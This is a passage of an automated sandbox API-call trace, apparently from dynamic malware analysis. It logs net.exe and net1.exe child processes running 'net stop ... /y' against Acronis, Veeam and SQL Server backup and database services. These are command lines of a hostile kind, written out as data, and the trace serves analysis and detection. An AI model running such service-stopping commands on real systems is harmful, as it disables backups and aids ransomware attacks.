(_String1="helpmsg", _String2="stop") returned -11 [0047.292] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0047.292] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0047.292] _wcsicmp (_String1="session", _String2="stop") returned -15 [0047.292] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0047.293] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0047.293] _wcsicmp (_String1="share", _String2="stop") returned -12 [0047.293] _wcsicmp (_String1="start", _String2="stop") returned -14 [0047.293] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0047.293] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0047.293] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0047.293] _wcsicmp (_String1="accounts", _String2="AcrSch2Svc") returned -15 [0047.293] _wcsicmp (_String1="computer", _String2="AcrSch2Svc") returned 2 [0047.293] _wcsicmp (_String1="config", _String2="AcrSch2Svc") returned 2 [0047.293] _wcsicmp (_String1="continue", _String2="AcrSch2Svc") returned 2 [0047.293] _wcsicmp (_String1="cont", _String2="AcrSch2Svc") returned 2 [0047.293] _wcsicmp (_String1="file", _String2="AcrSch2Svc") returned 5 [0047.293] _wcsicmp (_String1="files", _String2="AcrSch2Svc") returned 5 [0047.293] _wcsicmp (_String1="group", _String2="AcrSch2Svc") returned 6 [0047.293] _wcsicmp (_String1="groups", _String2="AcrSch2Svc") returned 6 [0047.293] _wcsicmp (_String1="help", _String2="AcrSch2Svc") returned 7 [0047.293] _wcsicmp (_String1="helpmsg", _String2="AcrSch2Svc") returned 7 [0047.293] _wcsicmp (_String1="localgroup", _String2="AcrSch2Svc") returned 11 [0047.293] _wcsicmp (_String1="pause", _String2="AcrSch2Svc") returned 15 [0047.293] _wcsicmp (_String1="session", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="sessions", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="sess", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="share", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="start", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="stats", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="statistics", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="stop", _String2="AcrSch2Svc") returned 18 [0047.293] _wcsicmp (_String1="time", _String2="AcrSch2Svc") returned 19 [0047.293] _wcsicmp (_String1="user", _String2="AcrSch2Svc") returned 20 [0047.293] _wcsicmp (_String1="users", _String2="AcrSch2Svc") returned 20 [0047.293] _wcsicmp (_String1="msg", _String2="AcrSch2Svc") returned 12 [0047.293] _wcsicmp (_String1="messenger", _String2="AcrSch2Svc") returned 12 [0047.293] _wcsicmp (_String1="receiver", _String2="AcrSch2Svc") returned 17 [0047.293] _wcsicmp (_String1="rcv", _String2="AcrSch2Svc") returned 17 [0047.293] _wcsicmp (_String1="netpopup", _String2="AcrSch2Svc") returned 13 [0047.293] _wcsicmp (_String1="redirector", _String2="AcrSch2Svc") returned 17 [0047.293] _wcsicmp (_String1="redir", _String2="AcrSch2Svc") returned 17 [0047.293] _wcsicmp (_String1="rdr", _String2="AcrSch2Svc") returned 17 [0047.294] _wcsicmp (_String1="workstation", _String2="AcrSch2Svc") returned 22 [0047.294] _wcsicmp (_String1="work", _String2="AcrSch2Svc") returned 22 [0047.294] _wcsicmp (_String1="wksta", _String2="AcrSch2Svc") returned 22 [0047.294] _wcsicmp (_String1="prdr", _String2="AcrSch2Svc") returned 15 [0047.294] _wcsicmp (_String1="devrdr", _String2="AcrSch2Svc") returned 3 [0047.294] _wcsicmp (_String1="lanmanworkstation", _String2="AcrSch2Svc") returned 11 [0047.294] _wcsicmp (_String1="server", _String2="AcrSch2Svc") returned 18 [0047.294] _wcsicmp (_String1="svr", _String2="AcrSch2Svc") returned 18 [0047.294] _wcsicmp (_String1="srv", _String2="AcrSch2Svc") returned 18 [0047.294] _wcsicmp (_String1="lanmanserver", _String2="AcrSch2Svc") returned 11 [0047.294] _wcsicmp (_String1="alerter", _String2="AcrSch2Svc") returned 9 [0047.294] _wcsicmp (_String1="netlogon", _String2="AcrSch2Svc") returned 13 [0047.294] _wcsupr (in: _String="AcrSch2Svc" | out: _String="ACRSCH2SVC") returned="ACRSCH2SVC" [0047.294] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54c8 [0047.297] GetServiceKeyNameW (in: hSCManager=0x5c54c8, lpDisplayName="ACRSCH2SVC", lpServiceName=0x95aaf0, lpcchBuffer=0x13fe2c | out: lpServiceName="", lpcchBuffer=0x13fe2c) returned 0 [0047.297] _wcsicmp (_String1="msg", _String2="ACRSCH2SVC") returned 12 [0047.297] _wcsicmp (_String1="messenger", _String2="ACRSCH2SVC") returned 12 [0047.297] _wcsicmp (_String1="receiver", _String2="ACRSCH2SVC") returned 17 [0047.297] _wcsicmp (_String1="rcv", _String2="ACRSCH2SVC") returned 17 [0047.297] _wcsicmp (_String1="redirector", _String2="ACRSCH2SVC") returned 17 [0047.297] _wcsicmp (_String1="redir", _String2="ACRSCH2SVC") returned 17 [0047.297] _wcsicmp (_String1="rdr", _String2="ACRSCH2SVC") returned 17 [0047.297] _wcsicmp (_String1="workstation", _String2="ACRSCH2SVC") returned 22 [0047.297] _wcsicmp (_String1="work", _String2="ACRSCH2SVC") returned 22 [0047.297] _wcsicmp (_String1="wksta", _String2="ACRSCH2SVC") returned 22 [0047.297] _wcsicmp (_String1="prdr", _String2="ACRSCH2SVC") returned 15 [0047.297] _wcsicmp (_String1="devrdr", _String2="ACRSCH2SVC") returned 3 [0047.297] _wcsicmp (_String1="lanmanworkstation", _String2="ACRSCH2SVC") returned 11 [0047.297] _wcsicmp (_String1="server", _String2="ACRSCH2SVC") returned 18 [0047.297] _wcsicmp (_String1="svr", _String2="ACRSCH2SVC") returned 18 [0047.297] _wcsicmp (_String1="srv", _String2="ACRSCH2SVC") returned 18 [0047.297] _wcsicmp (_String1="lanmanserver", _String2="ACRSCH2SVC") returned 11 [0047.298] _wcsicmp (_String1="alerter", _String2="ACRSCH2SVC") returned 9 [0047.298] _wcsicmp (_String1="netlogon", _String2="ACRSCH2SVC") returned 13 [0047.298] NetServiceControl (in: servername=0x0, service="ACRSCH2SVC", opcode=0x0, arg=0x0, bufptr=0x13fe28 | out: bufptr=0x13fe28) returned 0x889 [0047.298] wcscpy_s (in: _Destination=0x95a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0047.298] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0047.299] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x95b338, nSize=0x800, Arguments=0x959dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0047.300] GetFileType (hFile=0x26c) returned 0x3 [0047.300] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5c3ff8 [0047.300] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5c3ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0047.300] WriteFile (in: hFile=0x26c, lpBuffer=0x5c3ff8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13fd68, lpOverlapped=0x0 | out: lpBuffer=0x5c3ff8*, lpNumberOfBytesWritten=0x13fd68*=0x1e, lpOverlapped=0x0) returned 1 [0047.300] LocalFree (hMem=0x5c3ff8) returned 0x0 [0047.300] GetFileType (hFile=0x26c) returned 0x3 [0047.300] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c62a0 [0047.300] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0047.300] WriteFile (in: hFile=0x26c, lpBuffer=0x5c62a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fd68, lpOverlapped=0x0 | out: lpBuffer=0x5c62a0*, lpNumberOfBytesWritten=0x13fd68*=0x2, lpOverlapped=0x0) returned 1 [0047.300] LocalFree (hMem=0x5c62a0) returned 0x0 [0047.300] _ultow (in: _Dest=0x889, _Radix=1310104 | out: _Dest=0x889) returned="2185" [0047.300] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x95b338, nSize=0x800, Arguments=0x959dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0047.301] GetFileType (hFile=0x26c) returned 0x3 [0047.301] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5c62a0 [0047.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5c62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0047.301] WriteFile (in: hFile=0x26c, lpBuffer=0x5c62a0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13fd74, lpOverlapped=0x0 | out: lpBuffer=0x5c62a0*, lpNumberOfBytesWritten=0x13fd74*=0x34, lpOverlapped=0x0) returned 1 [0047.301] LocalFree (hMem=0x5c62a0) returned 0x0 [0047.301] GetFileType (hFile=0x26c) returned 0x3 [0047.301] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c62a0 [0047.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0047.301] WriteFile (in: hFile=0x26c, lpBuffer=0x5c62a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fd74, lpOverlapped=0x0 | out: lpBuffer=0x5c62a0*, lpNumberOfBytesWritten=0x13fd74*=0x2, lpOverlapped=0x0) returned 1 [0047.301] LocalFree (hMem=0x5c62a0) returned 0x0 [0047.301] NetApiBufferFree (Buffer=0x5c1c70) returned 0x0 [0047.301] NetApiBufferFree (Buffer=0x5c1c88) returned 0x0 [0047.301] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0047.398] exit (_Code=2) Process: id = "98" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x44ac8000" os_pid = "0x8b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 166 os_tid = 0xa10 Process: id = "99" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46d5b000" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0x8b0" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 167 os_tid = 0x978 [0047.597] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fb70 | out: lpSystemTimeAsFileTime=0x27fb70*(dwLowDateTime=0xe67eb6c0, dwHighDateTime=0x1d57a86)) [0047.597] GetCurrentProcessId () returned 0x8ac [0047.597] GetCurrentThreadId () returned 0x978 [0047.597] GetTickCount () returned 0x1146d25 [0047.597] QueryPerformanceCounter (in: lpPerformanceCount=0x27fb68 | out: lpPerformanceCount=0x27fb68*=16788183586) returned 1 [0047.597] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0047.597] __set_app_type (_Type=0x1) [0047.597] __p__fmode () returned 0x74eb31f4 [0047.598] __p__commode () returned 0x74eb31fc [0047.598] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0047.598] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0047.598] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.598] GetConsoleOutputCP () returned 0x1b5 [0047.598] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0047.599] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.603] sprintf_s (in: _DstBuf=0x27fb28, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0047.603] setlocale (category=0, locale=".437") returned="English_United States.437" [0047.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0047.606] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0047.606] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0047.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f8f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0047.606] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x74) returned 0x33f788 [0047.606] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0047.606] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27faf8 | out: Buffer=0x27faf8*=0x341c78) returned 0x0 [0047.606] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27faf8 | out: Buffer=0x27faf8*=0x341c90) returned 0x0 [0047.606] _fileno (_File=0x74eb2900) returned -2 [0047.606] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0047.606] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0047.606] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0047.606] _wcsicmp (_String1="config", _String2="stop") returned -16 [0047.606] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0047.606] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0047.607] _wcsicmp (_String1="file", _String2="stop") returned -13 [0047.607] _wcsicmp (_String1="files", _String2="stop") returned -13 [0047.607] _wcsicmp (_String1="group", _String2="stop") returned -12 [0047.607] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0047.607] _wcsicmp (_String1="help", _String2="stop") returned -11 [0047.607] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0047.607] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0047.607] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0047.607] _wcsicmp (_String1="session", _String2="stop") returned -15 [0047.607] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0047.607] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0047.607] _wcsicmp (_String1="share", _String2="stop") returned -12 [0047.607] _wcsicmp (_String1="start", _String2="stop") returned -14 [0047.607] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0047.607] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0047.607] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0047.607] _wcsicmp (_String1="accounts", _String2="MSSQL$SYSTEM_BGC") returned -12 [0047.607] _wcsicmp (_String1="computer", _String2="MSSQL$SYSTEM_BGC") returned -10 [0047.607] _wcsicmp (_String1="config", _String2="MSSQL$SYSTEM_BGC") returned -10 [0047.607] _wcsicmp (_String1="continue", _String2="MSSQL$SYSTEM_BGC") returned -10 [0047.607] _wcsicmp (_String1="cont", _String2="MSSQL$SYSTEM_BGC") returned -10 [0047.607] _wcsicmp (_String1="file", _String2="MSSQL$SYSTEM_BGC") returned -7 [0047.607] _wcsicmp (_String1="files", _String2="MSSQL$SYSTEM_BGC") returned -7 [0047.607] _wcsicmp (_String1="group", _String2="MSSQL$SYSTEM_BGC") returned -6 [0047.607] _wcsicmp (_String1="groups", _String2="MSSQL$SYSTEM_BGC") returned -6 [0047.607] _wcsicmp (_String1="help", _String2="MSSQL$SYSTEM_BGC") returned -5 [0047.607] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SYSTEM_BGC") returned -5 [0047.607] _wcsicmp (_String1="localgroup", _String2="MSSQL$SYSTEM_BGC") returned -1 [0047.607] _wcsicmp (_String1="pause", _String2="MSSQL$SYSTEM_BGC") returned 3 [0047.608] _wcsicmp (_String1="session", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="sessions", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="sess", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="share", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="start", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="stats", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="statistics", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="stop", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="time", _String2="MSSQL$SYSTEM_BGC") returned 7 [0047.608] _wcsicmp (_String1="user", _String2="MSSQL$SYSTEM_BGC") returned 8 [0047.608] _wcsicmp (_String1="users", _String2="MSSQL$SYSTEM_BGC") returned 8 [0047.608] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0047.608] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0047.608] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.608] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.608] _wcsicmp (_String1="netpopup", _String2="MSSQL$SYSTEM_BGC") returned 1 [0047.608] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.608] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.608] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.608] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.608] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.608] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.608] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0047.608] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0047.608] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0047.608] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.608] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0047.609] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0047.609] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0047.609] _wcsupr (in: _String="MSSQL$SYSTEM_BGC" | out: _String="MSSQL$SYSTEM_BGC") returned="MSSQL$SYSTEM_BGC" [0047.609] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x345460 [0047.617] GetServiceKeyNameW (in: hSCManager=0x345460, lpDisplayName="MSSQL$SYSTEM_BGC", lpServiceName=0xb1aaf0, lpcchBuffer=0x27fa94 | out: lpServiceName="", lpcchBuffer=0x27fa94) returned 0 [0047.618] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0047.618] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0047.618] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.618] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.618] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.618] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.618] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0047.618] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.618] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.618] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0047.618] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0047.618] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0047.618] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0047.618] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.618] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.618] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0047.618] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0047.618] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0047.618] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0047.618] NetServiceControl (in: servername=0x0, service="MSSQL$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x27fa90 | out: bufptr=0x27fa90) returned 0x889 [0047.619] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0047.619] LoadLibraryW (lpLibFileName="NETMSG") returned 0x747a0000 [0047.620] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x747a0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0047.622] GetFileType (hFile=0x26c) returned 0x3 [0047.622] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x343f90 [0047.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x343f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0047.622] WriteFile (in: hFile=0x26c, lpBuffer=0x343f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27f9d0, lpOverlapped=0x0 | out: lpBuffer=0x343f90*, lpNumberOfBytesWritten=0x27f9d0*=0x1e, lpOverlapped=0x0) returned 1 [0047.622] LocalFree (hMem=0x343f90) returned 0x0 [0047.622] GetFileType (hFile=0x26c) returned 0x3 [0047.622] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x346238 [0047.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x346238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0047.622] WriteFile (in: hFile=0x26c, lpBuffer=0x346238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f9d0, lpOverlapped=0x0 | out: lpBuffer=0x346238*, lpNumberOfBytesWritten=0x27f9d0*=0x2, lpOverlapped=0x0) returned 1 [0047.622] LocalFree (hMem=0x346238) returned 0x0 [0047.622] _ultow (in: _Dest=0x889, _Radix=2619904 | out: _Dest=0x889) returned="2185" [0047.622] FormatMessageW (in: dwFlags=0x2800, lpSource=0x747a0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0047.622] GetFileType (hFile=0x26c) returned 0x3 [0047.623] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x346238 [0047.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x346238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0047.623] WriteFile (in: hFile=0x26c, lpBuffer=0x346238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27f9dc, lpOverlapped=0x0 | out: lpBuffer=0x346238*, lpNumberOfBytesWritten=0x27f9dc*=0x34, lpOverlapped=0x0) returned 1 [0047.623] LocalFree (hMem=0x346238) returned 0x0 [0047.623] GetFileType (hFile=0x26c) returned 0x3 [0047.623] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x346238 [0047.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x346238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0047.623] WriteFile (in: hFile=0x26c, lpBuffer=0x346238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f9dc, lpOverlapped=0x0 | out: lpBuffer=0x346238*, lpNumberOfBytesWritten=0x27f9dc*=0x2, lpOverlapped=0x0) returned 1 [0047.623] LocalFree (hMem=0x346238) returned 0x0 [0047.623] NetApiBufferFree (Buffer=0x341c78) returned 0x0 [0047.623] NetApiBufferFree (Buffer=0x341c90) returned 0x0 [0047.624] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0047.624] exit (_Code=2) Process: id = "100" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x45fcd000" os_pid = "0x8a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 168 os_tid = 0x8a4 Process: id = "101" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x45ce8000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "100" os_parent_pid = "0x8a0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 